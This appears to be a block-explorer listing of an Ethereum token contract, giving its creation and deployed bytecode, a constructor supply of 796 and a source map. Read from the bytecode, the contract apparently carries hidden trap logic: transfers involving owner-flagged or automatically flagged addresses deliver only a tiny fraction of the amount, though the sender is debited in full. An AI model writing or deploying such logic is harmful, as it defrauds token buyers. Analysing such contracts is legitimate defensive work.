565b94509492505050565b5f8262000c93576001905062000d65565b8162000ca2575f905062000d65565b816001811462000cbb576002811462000cc65762000cfc565b600191505062000d65565b60ff84111562000cdb5762000cda62000bef565b5b8360020a91508482111562000cf55762000cf462000bef565b5b5062000d65565b5060208310610133831016604e8410600b841016171562000d365782820a90508381111562000d305762000d2f62000bef565b5b62000d65565b62000d45848484600162000c28565b9250905081840481111562000d5f5762000d5e62000bef565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000d8482620007ea565b915062000d918362000d6c565b925062000dc07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000c82565b905092915050565b5f62000dd482620007ea565b915062000de183620007ea565b925082820262000df181620007ea565b9150828204841483151762000e0b5762000e0a62000bef565b5b5092915050565b5f62000e1e82620007ea565b915062000e2b83620007ea565b925082820190508082111562000e465762000e4562000bef565b5b92915050565b62000e5781620007ea565b82525050565b5f60608201905062000e725f83018662000884565b62000e81602083018562000e4c565b62000e90604083018462000e4c565b949350505050565b5f60208201905062000ead5f83018462000e4c565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000eec82620007ea565b915062000ef983620007ea565b92508262000f0c5762000f0b62000eb3565b5b828204905092915050565b5f62000f2382620007ea565b915062000f3083620007ea565b925082820390508181111562000f4b5762000f4a62000bef565b5b92915050565b6115e48062000f5f5f395ff3fe608060405234801561000f575f80fd5b50600436106100e8575f3560e01c80638da5cb5b1161008a578063a9059cbb11610064578063a9059cbb14610238578063b673f71a14610268578063dd62ed3e14610298578063f2fde38b146102c8576100e8565b80638da5cb5b146101e057806395d89b41146101fe5780639c4dfd281461021c576100e8565b806323b872dd116100c657806323b872dd14610158578063313ce5671461018857806370a08231146101a6578063715018a6146101d6576100e8565b806306fdde03146100ec578063095ea7b31461010a57806318160ddd1461013a575b5f80fd5b6100f46102e4565b6040516101019190611013565b60405180910390f35b610124600480360381019061011f91906110c4565b610374565b604051610131919061111c565b60405180910390f35b610142610396565b60405161014f9190611144565b60405180910390f35b610172600480360381019061016d919061115d565b61039f565b60405161017f919061111c565b60405180910390f35b6101906103cd565b60405161019d91906111c8565b60405180910390f35b6101c060048036038101906101bb91906111e1565b6103d5565b6040516101cd9190611144565b60405180910390f35b6101de61041b565b005b6101e861042e565b6040516101f5919061121b565b60405180910390f35b610206610455565b6040516102139190611013565b60405180910390f35b610236600480360381019061023191906111e1565b6104e5565b005b610252600480360381019061024d91906110c4565b610532565b60405161025f919061111c565b60405180910390f35b610282600480360381019061027d91906111e1565b610554565b60405161028f9190611144565b60405180910390f35b6102b260048036038101906102ad9190611234565b61059a565b6040516102bf9190611144565b60405180910390f35b6102e260048036038101906102dd91906111e1565b61061c565b005b6060600580546102f39061129f565b80601f016020809104026020016040519081016040528092919081815260200182805461031f9061129f565b801561036a5780601f106103415761010080835404028352916020019161036a565b820191905f5260205f20905b81548152906001019060200180831161034d57829003601f168201915b5050505050905090565b5f8061037e6106a0565b905061038b8185856106a7565b600191505092915050565b5f600454905090565b5f806103a96106a0565b90506103b68582856106b9565b6103c185858561074b565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61042361083b565b61042c5f6108c2565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546104649061129f565b80601f01602080910402602001604051908101604052809291908181526020018280546104909061129f565b80156104db5780601f106104b2576101008083540402835291602001916104db565b820191905f5260205f20905b8154815290600101906020018083116104be57829003601f168201915b5050505050905090565b6104ed61083b565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555050565b5f8061053c6106a0565b905061054981858561074b565b600191505092915050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61062461083b565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610694575f6040517f1e4fbdf700000000000000000000000000000000000000000000000000000000815260040161068b919061121b565b60405180910390fd5b61069d816108c2565b50565b5f33905090565b6106b48383836001610983565b505050565b5f6106c4848461059a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146107455781811015610736578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161072d939291906112cf565b60405180910390fd5b61074484848484035f610983565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107bb575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107b2919061121b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361082b575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610822919061121b565b60405180910390fd5b610836838383610b52565b505050565b6108436106a0565b73ffffffffffffffffffffffffffffffffffffffff1661086161042e565b73ffffffffffffffffffffffffffffffffffffffff16146108c0576108846106a0565b6040517f118cdaa70000000000000000000000000000000000000000000000000000000081526004016108b7919061121b565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036109f3575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109ea919061121b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a63575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610a5a919061121b565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610b4c578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610b439190611144565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ba2578060045f828254610b969190611331565b92505081905550610c72565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610c2c578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610c23939291906112cf565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cb9578060045f8282540392505081905550610d0e565b610cc4838383610d82565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b610d188282610e3e565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d759190611144565b60405180910390a3505050565b5f8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610e0a9190611331565b1115610e3357620cda99610cda83610e229190611364565b610e2c91906113d2565b9050610e37565b8190505b9392505050565b610e4661042e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015610ecb57506005600454610e8b91906113d2565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054105b8015610f3d5750610eda6103cd565b600a610ee69190611531565b6064610ef29190611364565b8160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610f3b919061157b565b115b15610f85578060035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610fc0578082015181840152602081019050610fa5565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610fe582610f89565b610fef8185610f93565b9350610fff818560208601610fa3565b61100881610fcb565b840191505092915050565b5f6020820190508181035f83015261102b8184610fdb565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61106082611037565b9050919050565b61107081611056565b811461107a575f80fd5b50565b5f8135905061108b81611067565b92915050565b5f819050919050565b6110a381611091565b81146110ad575f80fd5b50565b5f813590506110be8161109a565b92915050565b5f80604083850312156110da576110d9611033565b5b5f6110e78582860161107d565b92505060206110f8858286016110b0565b9150509250929050565b5f8115159050919050565b61111681611102565b82525050565b5f60208201905061112f5f83018461110d565b92915050565b61113e81611091565b82525050565b5f6020820190506111575f830184611135565b92915050565b5f805f6060848603121561117457611173611033565b5b5f6111818682870161107d565b93505060206111928682870161107d565b92505060406111a3868287016110b0565b9150509250925092565b5f60ff82169050919050565b6111c2816111ad565b82525050565b5f6020820190506111db5f8301846111b9565b92915050565b5f602082840312156111f6576111f5611033565b5b5f6112038482850161107d565b91505092915050565b61121581611056565b82525050565b5f60208201905061122e5f83018461120c565b92915050565b5f806040838503121561124a57611249611033565b5b5f6112578582860161107d565b92505060206112688582860161107d565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806112b657607f821691505b6020821081036112c9576112c8611272565b5b50919050565b5f6060820190506112e25f83018661120c565b6112ef6020830185611135565b6112fc6040830184611135565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61133b82611091565b915061134683611091565b925082820190508082111561135e5761135d611304565b5b92915050565b5f61136e82611091565b915061137983611091565b925082820261138781611091565b9150828204841483151761139e5761139d611304565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6113dc82611091565b91506113e783611091565b9250826113f7576113f66113a5565b5b828204905092915050565b5f8160011c9050919050565b5f808291508390505b60018511156114575780860481111561143357611432611304565b5b60018516156114425780820291505b808102905061145085611402565b9450611417565b94509492505050565b5f8261146f576001905061152a565b8161147c575f905061152a565b8160018114611492576002811461149c576114cb565b600191505061152a565b60ff8411156114ae576114ad611304565b5b8360020a9150848211156114c5576114c4611304565b5b5061152a565b5060208310610133831016604e8410600b84101617156115005782820a9050838111156114fb576114fa611304565b5b61152a565b61150d848484600161140e565b9250905081840481111561152457611523611304565b5b81810290505b9392505050565b5f61153b82611091565b9150611546836111ad565b92506115737fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611460565b905092915050565b5f61158582611091565b915061159083611091565b92508282039050818111156115a8576115a7611304565b5b9291505056fea26469706673582212209556c2382afaa72d1a8b92b7311b5ee86610ad612df9551325ef37f3ff336ba264736f6c63430008180033000000000000000000000000000000000000000000000000000000000000031c

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100e8575f3560e01c80638da5cb5b1161008a578063a9059cbb11610064578063a9059cbb14610238578063b673f71a14610268578063dd62ed3e14610298578063f2fde38b146102c8576100e8565b80638da5cb5b146101e057806395d89b41146101fe5780639c4dfd281461021c576100e8565b806323b872dd116100c657806323b872dd14610158578063313ce5671461018857806370a08231146101a6578063715018a6146101d6576100e8565b806306fdde03146100ec578063095ea7b31461010a57806318160ddd1461013a575b5f80fd5b6100f46102e4565b6040516101019190611013565b60405180910390f35b610124600480360381019061011f91906110c4565b610374565b604051610131919061111c565b60405180910390f35b610142610396565b60405161014f9190611144565b60405180910390f35b610172600480360381019061016d919061115d565b61039f565b60405161017f919061111c565b60405180910390f35b6101906103cd565b60405161019d91906111c8565b60405180910390f35b6101c060048036038101906101bb91906111e1565b6103d5565b6040516101cd9190611144565b60405180910390f35b6101de61041b565b005b6101e861042e565b6040516101f5919061121b565b60405180910390f35b610206610455565b6040516102139190611013565b60405180910390f35b610236600480360381019061023191906111e1565b6104e5565b005b610252600480360381019061024d91906110c4565b610532565b60405161025f919061111c565b60405180910390f35b610282600480360381019061027d91906111e1565b610554565b60405161028f9190611144565b60405180910390f35b6102b260048036038101906102ad9190611234565b61059a565b6040516102bf9190611144565b60405180910390f35b6102e260048036038101906102dd91906111e1565b61061c565b005b6060600580546102f39061129f565b80601f016020809104026020016040519081016040528092919081815260200182805461031f9061129f565b801561036a5780601f106103415761010080835404028352916020019161036a565b820191905f5260205f20905b81548152906001019060200180831161034d57829003601f168201915b5050505050905090565b5f8061037e6106a0565b905061038b8185856106a7565b600191505092915050565b5f600454905090565b5f806103a96106a0565b90506103b68582856106b9565b6103c185858561074b565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61042361083b565b61042c5f6108c2565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546104649061129f565b80601f01602080910402602001604051908101604052809291908181526020018280546104909061129f565b80156104db5780601f106104b2576101008083540402835291602001916104db565b820191905f5260205f20905b8154815290600101906020018083116104be57829003601f168201915b5050505050905090565b6104ed61083b565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555050565b5f8061053c6106a0565b905061054981858561074b565b600191505092915050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61062461083b565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610694575f6040517f1e4fbdf700000000000000000000000000000000000000000000000000000000815260040161068b919061121b565b60405180910390fd5b61069d816108c2565b50565b5f33905090565b6106b48383836001610983565b505050565b5f6106c4848461059a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146107455781811015610736578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161072d939291906112cf565b60405180910390fd5b61074484848484035f610983565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107bb575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107b2919061121b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361082b575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610822919061121b565b60405180910390fd5b610836838383610b52565b505050565b6108436106a0565b73ffffffffffffffffffffffffffffffffffffffff1661086161042e565b73ffffffffffffffffffffffffffffffffffffffff16146108c0576108846106a0565b6040517f118cdaa70000000000000000000000000000000000000000000000000000000081526004016108b7919061121b565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036109f3575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109ea919061121b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a63575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610a5a919061121b565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610b4c578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610b439190611144565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ba2578060045f828254610b969190611331565b92505081905550610c72565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610c2c578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610c23939291906112cf565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cb9578060045f8282540392505081905550610d0e565b610cc4838383610d82565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b610d188282610e3e565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d759190611144565b60405180910390a3505050565b5f8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610e0a9190611331565b1115610e3357620cda99610cda83610e229190611364565b610e2c91906113d2565b9050610e37565b8190505b9392505050565b610e4661042e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015610ecb57506005600454610e8b91906113d2565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054105b8015610f3d5750610eda6103cd565b600a610ee69190611531565b6064610ef29190611364565b8160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610f3b919061157b565b115b15610f85578060035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610fc0578082015181840152602081019050610fa5565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610fe582610f89565b610fef8185610f93565b9350610fff818560208601610fa3565b61100881610fcb565b840191505092915050565b5f6020820190508181035f83015261102b8184610fdb565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61106082611037565b9050919050565b61107081611056565b811461107a575f80fd5b50565b5f8135905061108b81611067565b92915050565b5f819050919050565b6110a381611091565b81146110ad575f80fd5b50565b5f813590506110be8161109a565b92915050565b5f80604083850312156110da576110d9611033565b5b5f6110e78582860161107d565b92505060206110f8858286016110b0565b9150509250929050565b5f8115159050919050565b61111681611102565b82525050565b5f60208201905061112f5f83018461110d565b92915050565b61113e81611091565b82525050565b5f6020820190506111575f830184611135565b92915050565b5f805f6060848603121561117457611173611033565b5b5f6111818682870161107d565b93505060206111928682870161107d565b92505060406111a3868287016110b0565b9150509250925092565b5f60ff82169050919050565b6111c2816111ad565b82525050565b5f6020820190506111db5f8301846111b9565b92915050565b5f602082840312156111f6576111f5611033565b5b5f6112038482850161107d565b91505092915050565b61121581611056565b82525050565b5f60208201905061122e5f83018461120c565b92915050565b5f806040838503121561124a57611249611033565b5b5f6112578582860161107d565b92505060206112688582860161107d565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806112b657607f821691505b6020821081036112c9576112c8611272565b5b50919050565b5f6060820190506112e25f83018661120c565b6112ef6020830185611135565b6112fc6040830184611135565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61133b82611091565b915061134683611091565b925082820190508082111561135e5761135d611304565b5b92915050565b5f61136e82611091565b915061137983611091565b925082820261138781611091565b9150828204841483151761139e5761139d611304565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6113dc82611091565b91506113e783611091565b9250826113f7576113f66113a5565b5b828204905092915050565b5f8160011c9050919050565b5f808291508390505b60018511156114575780860481111561143357611432611304565b5b60018516156114425780820291505b808102905061145085611402565b9450611417565b94509492505050565b5f8261146f576001905061152a565b8161147c575f905061152a565b8160018114611492576002811461149c576114cb565b600191505061152a565b60ff8411156114ae576114ad611304565b5b8360020a9150848211156114c5576114c4611304565b5b5061152a565b5060208310610133831016604e8410600b84101617156115005782820a9050838111156114fb576114fa611304565b5b61152a565b61150d848484600161140e565b9250905081840481111561152457611523611304565b5b81810290505b9392505050565b5f61153b82611091565b9150611546836111ad565b92506115737fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611460565b905092915050565b5f61158582611091565b915061159083611091565b92508282039050818111156115a8576115a7611304565b5b9291505056fea26469706673582212209556c2382afaa72d1a8b92b7311b5ee86610ad612df9551325ef37f3ff336ba264736f6c63430008180033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000031c

-----Decoded View---------------
Arg [0] : supply (uint256): 796

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000000000000000000000000000000000000000031c


Deployed Bytecode Sourcemap

27282:176:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16548:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18841:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17650:99;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19609:249;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17501:84;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17812:118;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13728:103;;;:::i;:::-;;13053:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16758:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22743:97;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;18135:182;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22615:120;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18380:142;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13986:220;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;16548:91;16593:13;16626:5;16619:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16548:91;:::o;18841:190::-;18914:4;18931:13;18947:12;:10;:12::i;:::-;18931:28;;18970:31;18979:5;18986:7;18995:5;18970:8;:31::i;:::-;19019:4;19012:11;;;18841:190;;;;:::o;17650:99::-;17702:7;17729:12;;17722:19;;17650:99;:::o;19609:249::-;19696:4;19713:15;19731:12;:10;:12::i;:::-;19713:30;;19754:37;19770:4;19776:7;19785:5;19754:15;:37::i;:::-;19802:26;19812:4;19818:2;19822:5;19802:9;:26::i;:::-;19846:4;19839:11;;;19609:249;;;;;:::o;17501:84::-;17550:5;17575:2;17568:9;;17501:84;:::o;17812:118::-;17877:7;17904:9;:18;17914:7;17904:18;;;;;;;;;;;;;;;;17897:25;;17812:118;;;:::o;13728:103::-;12939:13;:11;:13::i;:::-;13793:30:::1;13820:1;13793:18;:30::i;:::-;13728:103::o:0;13053:87::-;13099:7;13126:6;;;;;;;;;;;13119:13;;13053:87;:::o;16758:95::-;16805:13;16838:7;16831:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16758:95;:::o;22743:97::-;12939:13;:11;:13::i;:::-;22831:1:::1;22811:7;:17;22819:8;22811:17;;;;;;;;;;;;;;;:21;;;;22743:97:::0;:::o;18135:182::-;18204:4;18221:13;18237:12;:10;:12::i;:::-;18221:28;;18260:27;18270:5;18277:2;18281:5;18260:9;:27::i;:::-;18305:4;18298:11;;;18135:182;;;;:::o;22615:120::-;22684:7;22710;:17;22718:8;22710:17;;;;;;;;;;;;;;;;22703:24;;22615:120;;;:::o;18380:142::-;18460:7;18487:11;:18;18499:5;18487:18;;;;;;;;;;;;;;;:27;18506:7;18487:27;;;;;;;;;;;;;;;;18480:34;;18380:142;;;;:::o;13986:220::-;12939:13;:11;:13::i;:::-;14091:1:::1;14071:22;;:8;:22;;::::0;14067:93:::1;;14145:1;14117:31;;;;;;;;;;;:::i;:::-;;;;;;;;14067:93;14170:28;14189:8;14170:18;:28::i;:::-;13986:220:::0;:::o;4320:98::-;4373:7;4400:10;4393:17;;4320:98;:::o;24895:130::-;24980:37;24989:5;24996:7;25005:5;25012:4;24980:8;:37::i;:::-;24895:130;;;:::o;26611:487::-;26711:24;26738:25;26748:5;26755:7;26738:9;:25::i;:::-;26711:52;;26798:17;26778:16;:37;26774:317;;26855:5;26836:16;:24;26832:132;;;26915:7;26924:16;26942:5;26888:60;;;;;;;;;;;;;:::i;:::-;;;;;;;;26832:132;27007:57;27016:5;27023:7;27051:5;27032:16;:24;27058:5;27007:8;:57::i;:::-;26774:317;26700:398;26611:487;;;:::o;20243:308::-;20343:1;20327:18;;:4;:18;;;20323:88;;20396:1;20369:30;;;;;;;;;;;:::i;:::-;;;;;;;;20323:88;20439:1;20425:16;;:2;:16;;;20421:88;;20494:1;20465:32;;;;;;;;;;;:::i;:::-;;;;;;;;20421:88;20519:24;20527:4;20533:2;20537:5;20519:7;:24::i;:::-;20243:308;;;:::o;13218:166::-;13289:12;:10;:12::i;:::-;13278:23;;:7;:5;:7::i;:::-;:23;;;13274:103;;13352:12;:10;:12::i;:::-;13325:40;;;;;;;;;;;:::i;:::-;;;;;;;;13274:103;13218:166::o;14366:191::-;14440:16;14459:6;;;;;;;;;;;14440:25;;14485:8;14476:6;;:17;;;;;;;;;;;;;;;;;;14540:8;14509:40;;14530:8;14509:40;;;;;;;;;;;;14429:128;14366:191;:::o;25876:443::-;26006:1;25989:19;;:5;:19;;;25985:91;;26061:1;26032:32;;;;;;;;;;;:::i;:::-;;;;;;;;25985:91;26109:1;26090:21;;:7;:21;;;26086:92;;26163:1;26135:31;;;;;;;;;;;:::i;:::-;;;;;;;;26086:92;26218:5;26188:11;:18;26200:5;26188:18;;;;;;;;;;;;;;;:27;26207:7;26188:27;;;;;;;;;;;;;;;:35;;;;26238:9;26234:78;;;26285:7;26269:31;;26278:5;26269:31;;;26294:5;26269:31;;;;;;:::i;:::-;;;;;;;;26234:78;25876:443;;;;:::o;20875:1186::-;20981:1;20965:18;;:4;:18;;;20961:552;;21119:5;21103:12;;:21;;;;;;;:::i;:::-;;;;;;;;20961:552;;;21157:19;21179:9;:15;21189:4;21179:15;;;;;;;;;;;;;;;;21157:37;;21227:5;21213:11;:19;21209:117;;;21285:4;21291:11;21304:5;21260:50;;;;;;;;;;;;;:::i;:::-;;;;;;;;21209:117;21481:5;21467:11;:19;21449:9;:15;21459:4;21449:15;;;;;;;;;;;;;;;:37;;;;21142:371;20961:552;21543:1;21529:16;;:2;:16;;;21525:449;;21711:5;21695:12;;:21;;;;;;;;;;;21525:449;;;21928:19;21931:4;21937:2;21941:5;21928:2;:19::i;:::-;21911:9;:13;21921:2;21911:13;;;;;;;;;;;;;;;;:36;;;;;;;;;;;21525:449;21986:24;22000:2;22004:5;21986:13;:24::i;:::-;22043:2;22028:25;;22037:4;22028:25;;;22047:5;22028:25;;;;;;:::i;:::-;;;;;;;;20875:1186;;;:::o;22069:244::-;22145:7;22199:1;22185:7;:11;22193:2;22185:11;;;;;;;;;;;;;;;;22169:7;:13;22177:4;22169:13;;;;;;;;;;;;;;;;:27;;;;:::i;:::-;:31;22165:141;;;22242:7;22233:5;22225;:13;;;;:::i;:::-;22224:25;;;;:::i;:::-;22217:32;;;;22165:141;22289:5;22282:12;;22069:244;;;;;;:::o;22321:286::-;22415:7;:5;:7::i;:::-;22409:13;;:2;:13;;;;:67;;;;;22473:1;22458:12;;:16;;;;:::i;:::-;22441:9;:13;22451:2;22441:13;;;;;;;;;;;;;;;;:34;22409:67;:133;;;;